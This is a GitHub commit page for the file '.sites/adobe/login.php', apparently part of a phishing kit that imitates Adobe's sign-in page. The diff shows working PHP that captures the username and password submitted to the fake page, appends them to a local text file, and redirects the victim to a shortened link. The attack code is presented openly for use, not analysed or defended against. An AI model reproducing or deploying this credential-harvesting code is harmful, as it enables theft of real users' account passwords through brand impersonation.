Skip to content

Commit

Permalink
Update login.php
Browse files Browse the repository at this point in the history
  • Loading branch information
LxaNce-Hacker authored Feb 13, 2023
1 parent d39710e commit 05a0841
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .sites/adobe/login.php
Original file line number Diff line number Diff line change
Expand Up @@ -3,4 +3,4 @@
file_put_contents("usernames.txt", "Adobe Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://adobe.ly/2OE9ZKL');
exit();
?>
?>

0 comments on commit 05a0841

Please sign in to comment.